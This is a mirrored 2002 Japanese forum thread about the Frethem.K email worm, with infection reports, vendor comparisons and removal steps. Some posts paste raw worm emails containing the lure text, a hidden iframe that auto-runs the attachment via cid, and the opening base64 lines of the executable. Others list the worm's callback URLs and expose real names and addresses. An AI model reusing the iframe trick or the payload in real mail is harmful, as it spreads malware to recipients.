【流行の】Frethem【ﾖｶｰﾝ】

TOP カテ一覧スレ一覧 100～終まで 2ch元削除依頼
WindowsをAdministrator権限で常用してる人
【無料ｱﾝﾁｳｲﾙｽ】Dr.Web CureIt!【ｲﾝｽﾄｰﾙ不要】
Firewall,Gateway向けアンチウィルス
【ESET】 Smart Security その47 (ﾜｯﾁｮｲ)
1ch.tvのセキュリティってどうよ？
【無料】Privatefirewallってどうよ！その2
中学生でハッカーってやっぱすごいですか？
Kaspersky / カスペルスキー総合159
G DATAインターネットセキュリティ ver19
【クラウド】Panda Cloud Antivirus Part6

1 ：02/07/15 ～最終レス：2014/09/25: プレビューしただけで感染するウィルス「Frethem」に注意
～15日19時現在、未対応のアンチウィルスソフトもあり

http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.htm
2 ：: でじこのこべやのtaskbar.exeはウイルスじゃないにょ
3 ：: ニュース速報＋のスレ
【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.sc/test/read.cgi/newsplus/1026721442/l50
4 ：: ☆ウィルス情報＆質問　総合スレッド☆part4の767以後
http://pc.2ch.sc/test/read.cgi/sec/1024061532/767-
5 ：: >>1 乙
かわいそうな作者ﾀﾝ…
ttp://www.vector.co.jp/soft/win31/util/se018881.html
6 ：: うちの会社でも一人に感染し、exeを実行してしまったので、200人以上にばらまかれました。
7 ：: 全てのWinマシンはIE6にしていたはずだったんだが。

今日になって判明。
気難しい大ボスのマシンがデフォだった。しかもOutlookじゃなくてOE利用。
Nortonの定義ファイルも大昔。

誰だよ、対処しないで放置したの（笑
8 ：: IE5.0ってパッチあててももうだめかな？
ギコの口が変になるから未だにバージョンアップしてないのだが・・・
9 ：: >>8
スレ違いの話だけど。
IE6突っ込むなら、クリーンインストール後にやった方がいいよ。
何故かしらんけど、IE5.5にパッチとか散々入れた後だと、IE6インスコ直後から落ちまくりだった。

10 ：: ちなみに、アドレス一覧から宛先を指定しているようでは無かったです。
ひょっとすると、受信したメールのアドレスに対して全て送信していたかもしれません。
11 ：: こんな2ちゃんねらー気取りの厨房が立てたスレッドは嫌だ。
12 ：: アドレスを登録していない人にfromが自分のアドレスのメールが行った
人がいたのでそうかも。偽ったかもしらん。
13 ：: http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.jpg
Becky!だ
14 ：: 何て読むのよ？　ふりーぜん？
15 ：: OEじゃ怖くてスクリーンショットとれなかったんだろ⊂ ´⌒つ゜ー゜)つ
16 ：: 現地点ではNortonせんせでは亜種が引っかからないyo!
17 ：: ついでに、発信元になってしまった社内の方、Windows updateは最新の状況に
なっていました。Nortonのウイルス定義ファイルも最新だったようです。
その社員の方からばら撒かれたメールは、OutlookとOutlook expで添付ファイ
ルがあったり、無かったりの症状でした。
Outlook expを利用している方は、添付ファイルが見えてしまうようなので、と
もかくexeファイルを実行しないようにしてくださいネ。
18 ：: >>17
保存しとく？って警告が出るはずなのにな。
そこで思いつかないってのは、困ったさんっすね。
19 ：: >>9
アドバイスサンクス
バージョンアップしよ。メーラがHTMLメール比対応のAL-MAILだからあんま気にしてなかったけど。
スレ違いにつきsage
>>14
トレンドマイクロによるとフレゼムKだそうな。
20 ：: シマンテック、ニュースすら流してないし・・・
21 ：: >20
情報でとるよ
22 ：: 日本テレコムからウイルスｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!
Return-Path: <*********.ota@japan-telecom.co.jp>
Received: from sh.janog.gr.jp ([210.150.17.51]) by ****************
with ESMTP id <*****************************@sh.janog.gr.jp>;
Mon, 15 Jul 2002 15:**:** +0900
Received: by sh.janog.gr.jp (Postfix)
id 295BF3A618B; Mon, 15 Jul 2002 15:53:19 +0900 (JST)
Delivered-To: janog-outgoing@janog.gr.jp
Received: from Yellow.japan-telecom.co.jp (Yellow.japan-telecom.co.jp [210.146.35.35])
by sh.janog.gr.jp (Postfix) with ESMTP id CAB313A5F6F
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:18 +0900 (JST)
Received: from JTEnglish.japan-telecom.co.jp (localhost [127.0.0.1])
by Yellow.japan-telecom.co.jp (3.7W-Yellow) with ESMTP id g6F6r9409577
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:09 +0900 (JST)
Received: from AFRICA ([172.16.237.23])
by rs41ag02.japan-telecom.co.jp (Lotus Domino Release 5.0.8)
with SMTP id 2002071515523870:991 ;
Mon, 15 Jul 2002 15:52:38 +0900
From: *********.ota@japan-telecom.co.jp
To: janog-outgoing@janog.gr.jp
Subject: Re: Your password!
MIME-Version: 1.0
Date: Mon, 15 Jul 2002 15:52:39 +0900
Message-ID: <OF5C37EE24.9F67D683-ON49256BF7.0025C773@japan-telecom.co.jp>
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
--L1db82sd319dm2ns0f4383dhG
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
<HTML><HEAD></HEAD><BODY>

ATTENTION! 
You can access 
very important 
information by 
this password 
DO NOT SAVE 
password to disk 
use your mind 
now press 
cancel 
(Toshinori Ota)</BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-ID: <W8dqwq8q918213>
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAvUy/dazJBjmsyQY5rMkGOMhFSjmkyQY4QLk2OYzJBjuguT45/MkGOgy1L
jg4yQY6DLUqOYzJBjmsyQY5jMkGOCS1SjmAyQY5rMkCOATJBjoMtV45lMkGOUmljaGsyQY4AAAAA
23 ：: >>22
おぉ？
24 ：: 脳豚　トロすぎ
さっさと対応せんかい　役立たずめが
25 ：: >>22
名前消しもれてますよ。(ﾌﾟ
26 ：: >>22
> cancel 
> (Toshinori Ota)</BODY></HTML>
> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
実名晒してるぞ
27 ：: Norton は既に対応しとるよ
28 ：: あらららら。。。
29 ：: Toshinori Ota は、だれの名前かわからない。
To でも From でもないみたい。
Received: from AFRICA ([172.16.237.23])
の AFRICA って何でしょうか？
私のところには
Received: from AFRICA ([10.40.130.151])
から来ています。

30 ：: >>29
トレンドだかシマンテックでそのIPアドレス見たような記憶。
今、何故かどっちとも繋がらないんだけど。
31 ：: HELO AFRICAは多分そのウイルスがSMTPに対して吐いてるコマンド。
アドレスは知らんけど、多分そのPCのIPでしょ。
32 ：: >>30
おいおい、おまいはプライベートアドレスをしらんのか。
ここ出入り禁止。
33 ：: 俺、このウィルスばらまいたかも。
From のところ書き換えたりするよ。
34 ：: >>27
まだ対応していないよ。
02/07/15予定 (米国時間)

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
35 ：: >>34
http://securityresponse.symantec.com/avcenter/venc/data/w32.frethem.k@mm.html
には予定、とか書いてないように見えるけど気のせいでしょうか
36 ：: そう、Fromを偽造する。
社内から山ほどウイルスが来たと思ったら全部社外のIPからだった。
37 ：: >>29
漏れの勘違いでした。

Symantecにて、ver.Jとver.Kがそれぞれ別に掲載されました。
ver.k
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
ver.j
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

TrendMicroでは、まだ1つしか掲載されてないっす。
まとめて見るURLって、どうやるんでしたっけ？
（概要）　http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K
（詳細）　http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K&VSect=T

というか。漏れのところに届く、ファイルサイズがもっと小さいのがあるんすけど。
38 ：: うちにも職場にもｷﾀｰよ。
もう大騒ぎ（藁。
39 ：: >>32
きゃは！恥かしい限りっす。
一瞬これと勘違いしました。

>ワームはシステム常駐後、以下のサイトにアクセスを試み続けます。これはWeb広告サイトの紹介システムのポイントを稼ぐためと思われます：
40 ：: >>35
定義ファイルのリンク先に行ってみた？
まだ 12日付の定義で15日付の定義はでていないよ。
41 ：: うちの大学でも大暴れしてた！
60通位来てて、鯖も落ちました
42 ：: 「ポイント」とやらからの収入を得るのって、誰なのか気になる～
本名で登録していたなら、笑いっす。
43 ：: 脳豚　遅い　役立たず
44 ：: IFRAME実行系だから、とりあえずIE設定→カスタマイズ→IFRAME実行を無効でOKかな？
45 ：: 嚢豚 AntiVirus がやっと対応しますた
46 ：: 家のパソコンにも届きました。
アドレスで会社の人からとわかったんですが、家のPCのアドレスを
教えているのは会社では別の一人だけなんです。
その人に連絡したら自分は感染してないと言いました。

これって、ネットワーク感染ってことですか？
的外れな質問だったら許して下さいね。
47 ：: 感染すると以下のサイトに接続を繰り返す模様。
ポイント稼ぎ狙いの確信犯だな。
http://12.220.54.29/b.cgi
http://12.224.160.208/b.cgi
http://12.225.239.153/b.cgi
http://12.239.90.200/b.cgi
http://12.249.100.107/b.cgi
http://12.252.211.170/b.cgi
http://128.173.231.167/b.cgi
http://129.120.117.218/b.cgi
http://140.158.208.167/b.cgi
http://143.111.86.30/b.cgi
http://144.132.27.124/b.cgi
http://147.26.215.144/b.cgi
http://150.208.186.200/b.cgi
http://170.11.31.35/b.cgi
http://172.148.216.191/b.cgi
http://172.149.84.171/b.cgi
http://195.13.227.140/b.cgi
http://195.13.227.143/b.cgi
http://195.251.228.133/b.cgi
http://204.57.90.184/b.cgi
http://205.162.24.103/b.cgi
http://207.108.36.78/b.cgi
http://207.171.103.126/b.cgi
http://207.50.54.128/b.cgi
http://208.190.152.25/b.cgi
http://208.28.196.214/b.cgi
http://208.38.78.170/b.cgi
http://209.192.135.22/b.cgi
http://209.34.29.161/b.cgi
http://213.190.55.222/b.cgi
http://217.199.112.38/b.cgi
http://24.138.42.33/b.cgi
http://24.153.41.186/b.cgi
http://24.157.108.78/b.cgi
http://24.159.28.120/b.cgi
48 ：: 続き
http://24.198.18.192/b.cgi
http://24.24.128.16/b.cgi
http://24.242.106.163/b.cgi
http://24.243.76.55/b.cgi
http://24.25.79.187/b.cgi
http://24.91.146.67/b.cgi
http://24.91.187.71/b.cgi
http://4.47.227.27/b.cgi
http://63.106.67.21/b.cgi
http://63.231.167.66/b.cgi
http://63.71.246.234/b.cgi
http://64.211.174.43/b.cgi
http://64.249.48.181/b.cgi
http://65.25.12.45/b.cgi
http://65.67.205.182/b.cgi
http://66.108.150.226/b.cgi
http://66.189.114.161/b.cgi
http://66.233.33.212/b.cgi
http://66.30.52.166/b.cgi
http://66.31.193.42/b.cgi
http://66.31.93.30/b.cgi
http://66.41.32.83/b.cgi
http://66.68.22.102/b.cgi
http://68.113.156.82/b.cgi
http://68.35.125.130/b.cgi
http://68.42.253.163/b.cgi
http://68.57.88.25/b.cgi
http://68.69.53.36/b.cgi
49 ：: http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
> この亜種は、
> <a href="mailto:w32.frethem.k@mm.html">W32.Frethem.K@mm</a>として、
> 情報を提供しております。
クリックしたらちょっとビビったよ。
50 ：: まだ来ない。これってIEのキャッシュのHTML中のメールアドレスは
漁らないのかな。
51 ：: とにかくすごい量ﾀﾞﾀｰﾖ。
52 ：: うちは３通。
そのうちMLからが２通。ﾅﾝﾀﾞｶﾅ（´Å｀）
53 ：: しっかし脳豚は使えねーな。
未だに対策無しとは・・・ダメだこりゃ。
54 ：: とりあえずIFRAMEを切っとけば問題無しじゃないの？
55 ：: ■ウィルス対策ベンダー各社Frethem.K対応時刻■

・トレンドマイクロ
　　→ 15日19時頃？
・ネットワークアソシエイツ
　　→ 15日19時頃？
・シマンテック
　　→ 15日23時頃？

各社が15時頃からパターンファイル作成開始したと
すると、シマンテックだけ倍近くかかってるってこと？
シマンテックだめじゃん・・・
56 ：: 区分お知らせ　
投稿日付 2002年07月15日(月)　20時55分29秒
投稿者 COOL管理者メール webmaster@cool.ne.jp
時期・期間指定無し
該当都市なし
内容ご利用いただきありがとう御座います。

recruit@cool.ne.jpよりワーム型ウイルス（Win32.Frethem.k）のメールが送信されている可能性が御座います。

Re: Your password!

上記の件名で送信されているメールに添付されているファイルは実行せず、必ず破棄されるようお願いいたします。
また、感染の疑いがある場合は早急に調査をされるようお願いいたします。
＊ウイルスの詳細に関しては以下のURL等をご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp

現在、詳細を調査中ですが、詳しい事が分かり次第追ってご報告させていただきます。
57 ：: 漏れ、ｵﾗｸﾙﾒｰﾘﾝｸﾞﾘｽﾄから貰った（´Д｀；）
ﾒｰﾙのﾍｯﾀﾞって公開していいの？
58 ：: 公開してヨシ！
59 ：: ｾﾞﾋﾐｾﾃｸﾀﾞｻｲ
60 ：: From - Wed Nov 14 22:32:40 2001
X-UIDL: ***********************************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Apparently-To: ******@******.jp *****************.jp; 15 Jul 2002 19:25:28 +0900 (JST)
Return-Path: <***********@******.oracle.co.jp>
X-Track: 1: 40
Received: from ******.oracle.co.jp (202.***.136.**)
by ****************.jp with SMTP; 15 Jul 2002 19:25:25 +0900 (JST)
Received: from localhost (daemon@localhost)
by *******.oracle.co.jp (**************) with SMTP id *******;
Mon, 15 Jul 2002 19:13:07 +0900 (JST)
Received: by oracle.co.jp (bulk_mailer v1.13); Mon, 15 Jul 2002 19:12:40 +0900
Received: (from majordom@localhost)
by naoko.oracle.co.jp (***********) id *******
for terakoya_tech-going; Mon, 15 Jul 2002 19:12:40 +0900 (JST)
X-Authentication-Warning: *******.oracle.co.jp: majordom set sender to owner-terakoya_tech using -f
Received: from mx.ctc-g.co.jp (ns.ctc-g.co.jp [131.248.**.*])
by *****.oracle.co.jp (*************) with ESMTP id ********
for <**********@*****.oracle.co.jp>; Mon, 15 Jul 2002 19:12:38 +0900 (JST)
From: tsuyoshi.ikeda@*******.**.jp
Received: by mx.ctc-g.co.jp (CTC-GN mail 11/07/98) id *******; Mon, 15 Jul 2002 19:25:08 +0900 (JST)
Received: by mx1.ctc-g.co.jp (CTC-GN mail 04/16/98) id ********; Mon, 15 Jul 2002 16:37:47 +0900
Received: by ctcfe.ctc-g.co.jp (CTC-GN mail 11/12/01) id ********; Mon, 15 Jul 2002 16:38:25 +0900
Date: Mon, 15 Jul 2002 16:38:25 +0900
Message-Id: <200207150738.QAA14242@ctcfe.ctc-g.co.jp>
To: ************@*****.oracle.co.jp
Subject: [terakoya'tech'info:75] Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
Sender: **********@*****.oracle.co.jp
--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>

ATTENTION! 
You can access 
very important 
information by 
this password 
DO NOT SAVE 
password to disk 
use your mind 
now press 
cancel 
(＊＊　＊)</BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
61 ：: Subject: InterScanメッセージ：受信者へ。ファイルブロックに適合したため処理が実行されました。
Date: Mon, 15 Jul 2002 21:09:10 +0900
From: <Administrator@turbolinux.co.jp>
To: <tl-users@meigetsu.turbolinux.co.jp>
InterScan for Microsoft Exchangeにより添付ファイルがブロックされました。
送信者 = konishi@mail.doshisha.ac.jp
受信者 = tl-users@meigetsu.turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 21:09:10
ファイルブロック時の処理：
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。InterScanにより削除が実行されました。
62 ：: Subject: InterScanメッセージ：受信者へ。ウイルスが検出されたか、または添付ファイルブロックの条件に一致しました。
Date: Mon, 15 Jul 2002 20:50:32 +0900
From: System Attendant <POO02-SA@pc-daiwabo.co.jp>
To: "'turbolist-ml@turbolinux.co.jp'" <turbolist-ml@turbolinux.co.jp>
InterScan for Microsoft Exchangeにより、メールに処理が実行されました。詳細は
次の通りです。
送信者 = tachiki@dd.iij4u.or.jp
受信者 = turbolist-ml@turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 20:50:32
検索エンジン/パターン = 6.150-1001/317
ウイルス発見時の処理：
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。
InterScanにより移動が実行されました。添付ファイルは
D:\Trend\Isme\Alert\decrypt-password3d32b70816c.exe_ に移動されました。
受信者への警告！ InterScanによりウイルスが検出されました。
63 ：: なんだ、実験講師か。
64 ：: Date: Mon, 15 Jul 2002 21:30:07 +0900
From: "奥原浩" <2000z28@kumagaya-h.ed.jp>
Reply-To: <2000z28@kumagaya-h.ed.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。

--
*******************************************************
熊谷高校 COM事務局奥原浩
Kumagaya Boys' Highschool Webmaster Okuhara Hiroshi
Mail: 2000z28@kumagaya-h.ed.jp
HP:http://www.kumagaya-h.ed.jp
*******************************************************
--

アホかっちゅうの、MLに投げるなっちゅうの。
65 ：: COM事務局がコレかよ(ｗ
66 ：: comかぁ。。。
.netかぁ。。。
MS逝ってよし！
67 ：: ようやくノートンとInterscanで検出できるようになった
68 ：: Frethem.kのウィルスが来たのですが、
トレンドマイクロのホームページ見たら
「プレビューしただけで感染」と書いてありました。
もちろん何も知らないのでプレビューしたのですが、
そのときにメーラーが「ウィルスと思われるファイルがありますが…」と表示したのですが、
この場合も感染したことになるのでしょうか？
一応ウィルス検索のために
新規フォルダを作ってそこに保存したのですが。
危ないでしょうか？
69 ：: あ、ちなみに送られてきたのは
>>56のcoolからです
70 ：: >>68
対処方法
Windowsフォルダーにコピーされた taskbar.exe を削除する。
参考手順：
1.インターネット接続を遮断する。
（クライアント PC に接続されているイーサネットケーブルや無線 LAN カードを物理的に抜くのが確実です。）
これによって、ウイルスが動作した場合にも、メール送信による感染拡大を防ぎます。
2.添付ファイルをもった該当メールのメッセージを削除する。
3.Control キー、Alt キー、Delete キーを同時に押下し、プログラム一覧から taskbar を選択し、強制終了する。
4.「スタート」「検索」から、taskbar.exe を探し、削除する。
5.再起動する。
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
71 ：: >>70
taskbar.exeが見当たらないってことは
感染してないってことでしょうか？
72 ：: >>71
そうです。文章をよく読みましょう。ハアト。
73 ：: Subject: そちらからウィルスが送られてきました
Date: Mon, 15 Jul 2002 22:02:23 +0900
From: "Yukihiro Yonehara" <acalanata@mm.neweb.ne.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。
至急、対応願います。
米原　幸宏

やかましいんじゃボゲッ！！
なにが至急、対応願いますだアホ
74 ：: シャープから来ますた。
Received: from rcpt-impgw.biglobe.ne.jp by biglobe.ne.jp (RCPT_GW)
id TAA10966; Mon, 15 Jul 2002 19:15:18 +0900 (JST)
Received: from tg4.sharp.co.jp (tg4.sharp.co.jp [211.4.241.22])
by rcpt-impgw.biglobe.ne.jp (mnmy/3916220502) with ESMTP id g6FAFGc10946
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:17 +0900 (JST)
Received: from tg.sharp.co.jp (unknown [10.65.37.38])
by tg4.sharp.co.jp (Postfix) with ESMTP id 8CB193C243
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:16 +0900 (JST)
Received: from ws2-tnr.sharp.co.jp (unknown [10.65.37.40])
by tg.sharp.co.jp (Postfix) with SMTP id 2B92511568A
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:15 +0900 (JST)
Received: FROM mail.sharp.co.jp BY ws2-tnr.sharp.co.jp ; Mon Jul 15 19:14:45 2002 +0900
Received: from AFRICA by mail.sharp.co.jp (8.10.2/1.1.2.11/09Feb01-0154PM)
id g6FAEjw0002344278; Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Date: Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Message-Id: <200207151014.g6FAEjw0002344278@mail.sharp.co.jp>
From: audio_support@sharp.co.jp
To: xxx@xxx.biglobe.ne.jp
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
X-UIDL: 799792848084825F976256025F999313405F255
75 ：: レジストリに
taskbar display "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY"

てあるんですけど　これですか？　これを削除すれば　いいんですか？
初めてのことなんで。。。
76 ：: >>75
それは違う、解像度変更のタスクバーアイコンのやつだろ
77 ：: >>76
そうだったんですか・・ありがとうございます。
パッチ当ててないＩＥとＯＥ使ってるヘタレなもんで。。
ウィルスメール受け取ったの今回が初めてなもんで（汗
まあ　明らかに怪しいメールだったんで　プレビューで表示されたけど　添付ファイルだけは開けないでそのまま削除しといたんです。
78 ：: >>77
というかなんでパッチ当てないのかききたい。
へたれとか言ってる暇があったら当てれ。
79 ：: 大学のサーバーが落ちますた
80 ：: >>64
こいつうちにもきたぞ何者だ？
81 ：: >>80
MLのROMで
MLへのポスト/リプライの仕方知らない人
82 ：: Subject: メーリングリスト停止のお願い
Date: Tue, 16 Jul 2002 00:42:37 +0900
From: 石川初男 <ishikawa@tmc-ipd.ac.jp>
To: turbolist-ml@turbolinux.co.jp
管理者殿
　ウィルスの発信元が貴殿のメーリングリストからのものになっています。
早急に停止を。

Subject: test
Date: Tue, 16 Jul 2002 00:52:00 +0900
From: 宮本明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@turbolinux.co.jp>

Subject: test
Date: Tue, 16 Jul 2002 00:52:37 +0900
From: 宮本明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@meigetsu.turbolinux.co.jp>

アホかっちゅうの
83 ：: このウィルスは送信者偽装するの？
84 ：: うざ
http://www.turbolinux.co.jp/dcforum/DCForumID11/4068.html
85 ：: 感染してしまった人は以下を参照
手動削除手順：
１）不正プログラムの自動起動設定を削除します。
Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。
場所: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値　: "Task Bar"="＜Windowsディレクトリ＞\taskbar.exe"
トレンドマイクロからコピペ
そしてwindowsディレクトリのtaskbar.exeを削除するのだ
86 ：: 感染後の処置方法等は各ベンダーのサイトでご確認ください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.l@MM
http://www.nai.com/japan/virusinfo/infoFrethem.asp
87 ：: 「メールにウィルスがおったぞｺﾞﾙｧ」って本文のFrom:に
投げるのはやめれ＞某組織
投げんならちゃんとenvelope fromに返せっつーの
ここは <> なメールも受け取らんし何考えてんだ
88 ：: うちにも２通来たけど、どっちも添付ファイルがなかった。
これは安全なのか？
89 ：: >>87
何も考えてない。
90 ：: 題名に「ウィルス」と入れて欲しかった
91 ：: うちのは taskbar.exe を削除したのに、まだウイルスばら撒いてる。
なんで？
92 ：: >>91 「WORM_FRETHEM.K」駆除ツール使え↓
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
駆除後はアンチウィルスソフト常駐させよ。
93 ：: >>87
KLEZ で詐称された From のアドレス宛に、ウィルス警告メールを送ってくる
対策ソフトもうざい。
94 ：: >>93 何のソフト？
95 ：: やーねぇ。
昨日夕刻にきたわよ。
その場でノートンの更新をしたけど駄目だったのよ。
アドレス帳が”送ってはいけない人たち”リストになってたのよ。
今日は朝から脅しメールや電話が来まくるのよやーねぇ。
96 ：: ちなみにあたしんちは三菱から来たわよ
98 ：: >>93
InterScanだとenvelope-fromに送るみたいだけど。
99 ：: 中京テレビのディズニーオンアイス事務局やられてねーか？
ディズニーオンアイス事務局あてのウイルス警告メールが
うちにがんがん流れてくるんだけど。なんで？
ちなみに本体は来てません。
100 ：: >>98 送らない設定にもできるみたいね。
101 ：: >99
ウチにもｶﾞﾝｶﾞﾝきてる・・・。ディズニーオンアイス・・・。

100～のスレッドの続きを読む

Sandboxie Vol.4
Online Armor Personal Firewall Free Part4
アンチドートを語ろう♪ MAP05
ウィルスバスターアップデート前にあげるスレ２
KINGSOFT Internet Security　Part27
今度ネットワークの仕事に就こうと思うんですが
【アビラ】Avira Antivirus ver.9
対エシュロンにもっとも効果的な手段は？
☆☆トロイの木馬☆☆5台目
スパイウェアで口座情報盗まれる?
--------------------
うたわれるもの総合　Part1
【東京地裁】弁護側は憲法で保障される表現の自由だと主張したが、中国籍の男女靖国神社侵入で有罪判決　２人は即日控訴[10/10]
【東海】プロ野球ファンのオフ【名古屋】
【キチガイ】次世代VR総合スレ2【日記帳】
StarSuite
† Red Devils Manchester United 1413 †
【猫】にゃんこのAAを貼るスレ8【ねこ・ネコ・ヌコ・ぬこ・cat】
【中日ドラゴンズ】石川昂弥応援スレ【未来の四番】
【櫻井翔･藤森】堀北真希の噂54【亀梨･北見】
富山の高校野球101
【怪しい偏差値】４工大？大東亜ｗ【２科目】
朝から発狂豚
【韓国秘薬】大便酒【よう効きまっせ】
日本人の多くが韓国に親しみを感じます♪♪♪ 3
龍虎の拳シリーズ総合スレ 6
【海外】中国・北京市で新たに36人感染、新型コロナ [太郎★]
【さすが早稲田の理工】2018年11月小保方晴子さんの発明が特許登録！！【復権】
樫の木モック
【伊福部崇】POARO ポアロスレ52【鷲崎健】
石橋貴明は何故岡村隆史に完敗したのか２
TOP カテ一覧スレ一覧 100～終まで 2ch元削除依頼